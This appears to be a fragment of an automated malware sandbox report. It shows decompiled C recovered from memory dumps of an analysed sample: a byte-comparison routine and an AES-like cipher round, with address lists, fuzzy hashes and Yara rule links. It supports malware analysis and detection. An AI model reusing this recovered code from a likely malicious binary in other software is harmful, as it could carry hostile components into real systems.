				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}

0x001afcde
0x001afcde
0x001afce4
0x001afd5b
0x001afd5d
0x001afd5f
0x00000000
0x00000000
0x001afd65
0x001afd6b
0x001afdf2
0x001afdf4
0x001afdf6
0x00000000
0x00000000
0x001afdfc
0x001afe02
0x001afe89
0x001afe8b
0x001afe8d
0x00000000
0x00000000
0x001afe93
0x001afe99
0x001aff20
0x001aff22
0x001aff24
0x00000000
0x00000000
0x001aff2a
0x001aff30
0x001affb7
0x001affb9
0x001affbb
0x00000000
0x00000000
0x001affc7
0x001b004f
0x001b0051
0x001b0053
0x00000000
0x00000000
0x001b0059
0x001b005f
0x001b00e6
0x001b00e8
0x001b00ea
0x001b00f8
0x001b00fa
0x001b0107
0x001b0107
0x001b00fa
0x00000000
0x001b00ea
0x001b006c
0x001b006e
0x001b0086
0x001b008e
0x001b0090
0x001b00a8
0x001b00b0
0x001b00b2
0x001b00ca
0x001b00d2
0x001b00d4
0x001b00dd
0x001b00dd
0x00000000
0x001b00d4
0x001b00bb
0x001b00c4
0x00000000
0x00000000
0x00000000
0x001b00c4
0x001b0099
0x001b00a2
0x00000000
0x00000000
0x00000000
0x001b00a2
0x001b0077
0x001b0080
0x00000000
0x00000000
0x00000000
0x001b0080
0x001affd5
0x001affd7
0x001affef
0x001afff7
0x001afff9
0x001b0011
0x001b0019
0x001b001b
0x001b0033
0x001b003b
0x001b003d
0x001b0046
0x001b0046
0x00000000
0x001b003d
0x001b0024
0x001b002d
0x00000000
0x00000000
0x00000000
0x001b002d
0x001b0002
0x001b000b
0x00000000
0x00000000
0x00000000
0x001b000b
0x001affe0
0x001affe9
0x00000000
0x00000000
0x00000000
0x001affe9
0x001aff3d
0x001aff3f
0x001aff57
0x001aff5f
0x001aff61
0x001aff79
0x001aff81
0x001aff83
0x001aff9b
0x001affa3
0x001affa5
0x001affae
0x001affae
0x00000000
0x001affa5
0x001aff8c
0x001aff95
0x00000000
0x00000000
0x00000000
0x001aff95
0x001aff6a
0x001aff73
0x00000000
0x00000000
0x00000000
0x001aff73
0x001aff48
0x001aff51
0x00000000
0x00000000
0x00000000
0x001aff51
0x001afea6
0x001afea8
0x001afec0
0x001afec8
0x001afeca
0x001afee2
0x001afeea
0x001afeec
0x001aff04
0x001aff0c
0x001aff0e
0x001aff17
0x001aff17
0x00000000
0x001aff0e
0x001afef5
0x001afefe
0x00000000
0x00000000
0x00000000
0x001afefe
0x001afed3
0x001afedc
0x00000000
0x00000000
0x00000000
0x001afedc
0x001afeb1
0x001afeba
0x00000000
0x00000000
0x00000000
0x001afeba
0x001afe0f
0x001afe11
0x001afe29
0x001afe31
0x001afe33
0x001afe4b
0x001afe53
0x001afe55
0x001afe6d
0x001afe75
0x001afe77
0x001afe80
0x001afe80
0x00000000
0x001afe77
0x001afe5e
0x001afe67
0x00000000
0x00000000
0x00000000
0x001afe67
0x001afe3c
0x001afe45
0x00000000
0x00000000
0x00000000
0x001afe45
0x001afe1a
0x001afe23
0x00000000
0x00000000
0x00000000
0x001afe23
0x001afd78
0x001afd7a
0x001afd92
0x001afd9a
0x001afd9c
0x001afdb4
0x001afdbc
0x001afdbe
0x001afdd6
0x001afdde
0x001afde0
0x001afde9
0x001afde9
0x00000000
0x001afde0
0x001afdc7
0x001afdd0
0x00000000
0x00000000
0x00000000
0x001afdd0
0x001afda5
0x001afdae
0x00000000
0x00000000
0x00000000
0x001afdae
0x001afd83
0x001afd8c
0x00000000
0x00000000
0x00000000
0x001afce6
0x001afce6
0x001afced
0x001afcef
0x001afd03
0x001afd03
0x001afd0b
0x001afd0d
0x001afd21
0x001afd21
0x001afd29
0x001afd2b
0x001afd3f
0x001afd3f
0x001afd47
0x001afd49
0x001afd52
0x001afd52
0x00000000
0x001afd49
0x001afd31
0x001afd34
0x001afd3d
0x00000000
0x00000000
0x00000000
0x001afd3d
0x001afd13
0x001afd16
0x001afd1f
0x00000000
0x00000000
0x00000000
0x001afd1f
0x001afcf5
0x001afcf8
0x001afd01
0x00000000
0x00000000
0x00000000
0x001afd01
0x001afcd6
0x001afcd6
0x001b0ac7

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 915c3ba94860e417efbb54e85c517f5d1e9d81441a4f0014bbc8a94789f8f13a
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: A4C1D77A2050970ADF2E467AC53453EFAA16AA37B131A077DD8B3CB0D5FF20C529D620

Uniqueness

Uniqueness Score: -1.00%

Function 001AF8C6, Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: e3352d91267875c2763cdd73448c4505c2e3b274307eba5fadeeddaf5a56f9f0
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 1AC1857A2051570ADF2D467AC53453EBBA16AA37B131A077DD8B3CB1C9FF20C52AD620

Uniqueness

Uniqueness Score: -1.00%

Function 0019DF12, Relevance: .3, Instructions: 318
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0019DF12(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				signed int _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x64);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x64) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
						E001AEA80(_t431 + 0x54, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E001AEA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
						}
						_t399 =  *(_t432 + 0x60);
						 *(_t432 + 0x1c) = _t399 + 8;
						_t229 =  *(_t432 + 0x70);
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x20) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
							E0019DEDF(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x44);
							 *(_t432 + 0x68) =  *(0x1d5350 + (_t402 & 0x000000ff) * 4) ^  *(0x1d5f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0x1d5b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x50);
							_t363 =  *(_t432 + 0x68) ^  *(0x1d5750 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x68) = _t363;
							 *(_t432 + 0x34) = _t363;
							_t403 =  *(_t432 + 0x48);
							_t368 =  *(0x1d5750 + (_t402 & 0x000000ff) * 4) ^  *(0x1d5350 + (_t403 & 0x000000ff) * 4) ^  *(0x1d5f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0x1d5b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							 *(_t432 + 0x70) = _t368;
							 *(_t432 + 0x38) = _t368;
							_t404 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0x1d5b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0x1d5750 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x10) ^  *(0x1d5350 + (_t404 & 0x000000ff) * 4) ^  *(0x1d5f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t372;
							 *(_t432 + 0x3c) = _t372;
							 *(_t432 + 0x14) =  *(0x1d5f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0x1d5b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x14) ^  *(0x1d5750 + (_t404 & 0x000000ff) * 4) ^  *(0x1d5350 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x14) = _t376;
							 *(_t432 + 0x40) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x68);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x14) = _t309;
							_t430 = _t309;
							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x10);
								 *(_t432 + 0x14) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x70);
								_t416 =  *(0x1d5750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1d5b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1d5f50 + (_t356 >> 0x18) * 4) ^  *(0x1d5350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
								 *(_t432 + 0x34) = _t416;
								 *(_t432 + 0x70) =  *(0x1d5b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1d5f50 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x70) ^  *(0x1d5750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1d5350 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x70) = _t388;
								 *(_t432 + 0x38) = _t388;
								_t394 =  *(0x1d5f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0x1d5750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1d5b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1d5350 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x10) = _t394;
								 *(_t432 + 0x3c) = _t394;
								_t376 =  *(0x1d5750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1d5b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1d5f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0x1d5350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
								_t135 = _t432 + 0x18;
								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
								 *(_t432 + 0x40) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x24));
							 *(_t432 + 0x68) = _t416;
							_t415 =  *(_t432 + 0x6c);
							 *(_t432 + 0x14) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
							 *(_t432 + 0x6c) = _t253;
							 *(_t432 + 0x44) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0x1d4230));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0x1d4230));
							_t423 =  *(_t432 + 0x6c);
							 *(_t432 + 0x4c) = _t406;
							 *(_t432 + 0x48) = _t350;
							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0x1d4230));
							 *(_t432 + 0x50) = _t378;
							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0x1d4230));
							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0x1d4230));
							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0x1d4230));
							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0x1d4230));
							_t170 = (_t406 >> 0x18) + 0x1d4230; // 0x54cbe9de
							 *((char*)(_t432 + 0x3b)) =  *_t170;
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0x1d4230));
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0x1d4230));
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0x1d4230));
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0x1d4230));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0x1d4230));
							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0x1d4230));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0x1d4230));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0x1d4230));
							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
							 *(_t432 + 0x6c) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x54);
								_t426 = _t426 ^  *(_t432 + 0x58);
								_t353 = _t353 ^  *(_t432 + 0x5c);
								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
							}
							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
							_t304 =  *(_t432 + 0x1c);
							 *(_t432 + 0x58) =  *(_t304 - 4);
							 *(_t432 + 0x5c) =  *_t304;
							 *(_t432 + 0x60) = _t304[1];
							_t382 =  *(_t432 + 0x20);
							 *(_t432 + 0x1c) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x6c);
							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x20) = _t359;
							 *(_t432 + 0x6c) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E0019E3D4(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
				}
				return _t222;
			}

0x0019df17
0x0019df1b
0x0019df1d
0x0019df23
0x0019df29
0x0019df30
0x0019df34
0x0019df4f
0x0019df58
0x0019df5d
0x0019df62
0x0019e3b9
0x00000000
0x0019e3c9
0x0019df68
0x0019df71
0x0019df75
0x0019df79
0x0019df7b
0x0019df7f
0x0019df82
0x0019df86
0x0019df86
0x0019df96
0x0019dfa3
0x0019dfa8
0x0019dfce
0x0019dfd2
0x0019dfdd
0x0019dfe4
0x0019dfe8
0x0019dfef
0x0019e015
0x0019e021
0x0019e025
0x0019e033
0x0019e03e
0x0019e055
0x0019e061
0x0019e065
0x0019e07c
0x0019e091
0x0019e098
0x0019e099
0x0019e09d
0x0019e0a4
0x00000000
0x00000000
0x0019e0aa
0x0019e0b4
0x0019e0b7
0x0019e0bb
0x0019e0bd
0x0019e0c1
0x0019e0c6
0x0019e0c9
0x0019e0cd
0x0019e0d3
0x0019e0d5
0x0019e0d9
0x0019e0e8
0x0019e118
0x0019e129
0x0019e13b
0x0019e157
0x0019e160
0x0019e164
0x0019e19d
0x0019e1a4
0x0019e1a8
0x0019e1d5
0x0019e1dc
0x0019e1dc
0x0019e1e1
0x0019e1e1
0x0019e1eb
0x0019e1ef
0x0019e1f3
0x0019e1f7
0x0019e1fb
0x0019e1fe
0x0019e202
0x0019e206
0x0019e210
0x0019e21d
0x0019e229
0x0019e230
0x0019e23a
0x0019e246
0x0019e24a
0x0019e24e
0x0019e258
0x0019e261
0x0019e26b
0x0019e278
0x0019e28a
0x0019e29c
0x0019e2a5
0x0019e2ab
0x0019e2bb
0x0019e2d0
0x0019e2e5
0x0019e2f4
0x0019e301
0x0019e30c
0x0019e315
0x0019e322
0x0019e32c
0x0019e33c
0x0019e33f
0x0019e342
0x0019e349
0x0019e34d
0x0019e34f
0x0019e353
0x0019e357
0x0019e35f
0x0019e35f
0x0019e369
0x0019e36d
0x0019e374
0x0019e37a
0x0019e384
0x0019e388
0x0019e38c
0x0019e390
0x0019e397
0x0019e39a
0x0019e39e
0x0019e3a1
0x0019e3a3
0x0019e3a6
0x0019e3a9
0x0019e3ad
0x0019e3ad
0x00000000
0x0019e3b8
0x00000000
0x0019df3f
0x0019e3d1

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd1ba6c5f392897ab3b860d8c95ca73745990a7969ca6d53f70318bdd8a30e1b
Instruction ID: 1db6b47408a602768373cdc29e20c8529ddf1372404bf06e0806b818c7afd81f
Opcode Fuzzy Hash: bd1ba6c5f392897ab3b860d8c95ca73745990a7969ca6d53f70318bdd8a30e1b
Instruction Fuzzy Hash: 40E1367551A3808FC304CF29E89086ABBF1BB8A305F89095FF9D587396C335E955CB62

Uniqueness

Uniqueness Score: -1.00%

Function 001A364E, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
